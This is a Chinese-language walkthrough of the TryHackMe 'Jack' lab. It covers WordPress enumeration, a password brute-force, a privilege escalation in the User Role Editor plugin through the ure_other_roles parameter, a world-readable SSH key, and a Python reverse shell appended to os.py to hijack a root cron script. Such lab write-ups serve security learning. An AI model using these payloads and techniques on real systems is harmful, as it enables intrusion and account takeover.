0%

TryHackMe-Jack

在线链接:Jack

0x01 信息收集

NMAP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
[email protected]:~# nmap -p- -sC -sV 10.10.145.220
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-04 02:58 UTC
Nmap scan report for ip-10-10-145-220.eu-west-1.compute.internal (10.10.145.220)
Host is up (0.0019s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 3e:79:78:08:93:31:d0:83:7f:e2:bc:b6:14:bf:5d:9b (RSA)
| 256 3a:67:9f:af:7e:66:fa:e3:f8:c7:54:49:63:38:a2:93 (ECDSA)
|_ 256 8c:ef:55:b0:23:73:2c:14:09:45:22:ac:84:cb:40:d2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 5.3.2
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Jack's Personal Site – Blog for Jacks writing adven...
MAC Address: 02:5D:A7:C5:D7:FD (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.06 seconds

wpscan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
[+] URL: http://jack.thm/ [10.10.145.220]
[+] Started: Sun Oct 4 03:13:23 2020

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] robots.txt found: http://jack.thm/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://jack.thm/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://jack.thm/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://jack.thm/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://jack.thm/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
| Found By: Rss Generator (Passive Detection)
| - http://jack.thm/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
| - http://jack.thm/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>

[+] WordPress theme in use: online-portfolio
| Location: http://jack.thm/wp-content/themes/online-portfolio/
| Last Updated: 2020-08-18T00:00:00.000Z
| Readme: http://jack.thm/wp-content/themes/online-portfolio/readme.txt
| [!] The version is out of date, the latest version is 0.0.9
| Style URL: http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2
| Style Name: Online Portfolio
| Style URI: https://www.amplethemes.com/downloads/online-protfolio/
| Description: Online Portfolio WordPress portfolio theme for building personal website. You can take full advantag...
| Author: Ample Themes
| Author URI: https://amplethemes.com/
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 0.0.7 (80% confidence)
| Found By: Style (Passive Detection)
| - http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2, Match: 'Version: 0.0.7'

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <======> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] jack
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://jack.thm/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] danny
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] wendy
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

有三个用户,

1
2
3
4
5
6
7
8
wpscan --url http://jack.thm -U user -P /usr/share/wordpress/fasttrack.txt

[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - wendy / changelater
Trying danny / starwars Time: 00:01:22 <====== > (646 / 868) 74.42% ETA: ??:??:

[!] Valid Combinations Found:
| Username: wendy, Password: changelater

这里我原先用了rockyou字典,但是等了2个多小时都毫无进展,于是换了一个小的。

0x02 提权

登陆进去后,只是一个普通的用户,做不了什么事情。

image-20201011143204465

但是通过提示的ure_other_roles可以搜索到一个user-role-edite插件4.25版本的越权漏洞,可以轻易的登陆成admin用户。

image-20201011140720925

漏洞利用也很简单,burp抓包,进入个人资料页,直接更新资料。

image-20201011143302363

添加一个参数即可。

1
ure_other_roles=adminsitrator

image-20201011150546590

登陆成admin用户后,我一般习惯修改主题文件,但是主题的php文件无法修改,于是就换成改插件的

image-20201009162043378

image-20201011150851846

接着开启监听,访问http://jack.thm/wp-content/plugins/akismet/index.php

image-20201011150938757

通过jack用户家目录下的备忘录可以知道,上次jack的备份文件差点导致被hack。

image-20201011151109922

这是一个重要提示,接着去访问/var/backups/

image-20201011151230563

可以发现有一个777权限的id_rsa。将这个文件复制到网站的根目录下

image-20201011151437443

成功越权到jack

image-20201011151546495

这个checker.py看上去是会定时执行的,但是这个脚本没有权限直接去修改它,当前目录也不能新建文件。

image-20201011151748582

但是我们有权限去修改os.py。

1
2
3
4
5
6
7
8
9
import os,socket,subprocess

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(('ip',8888))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(['/bin/bash','-i'])

简单的修改成

1
2
3
4
5
6
7
8
9
import socket,subprocess

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(('ip',8888))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
p=subprocess.call(['/bin/bash','-i'])

将上面修改后的内容,直接添加到os.py文件尾部。

image-20201011152202998

直接打开python,成功返回shell,现在只要等待就好了。

image-20201011152431111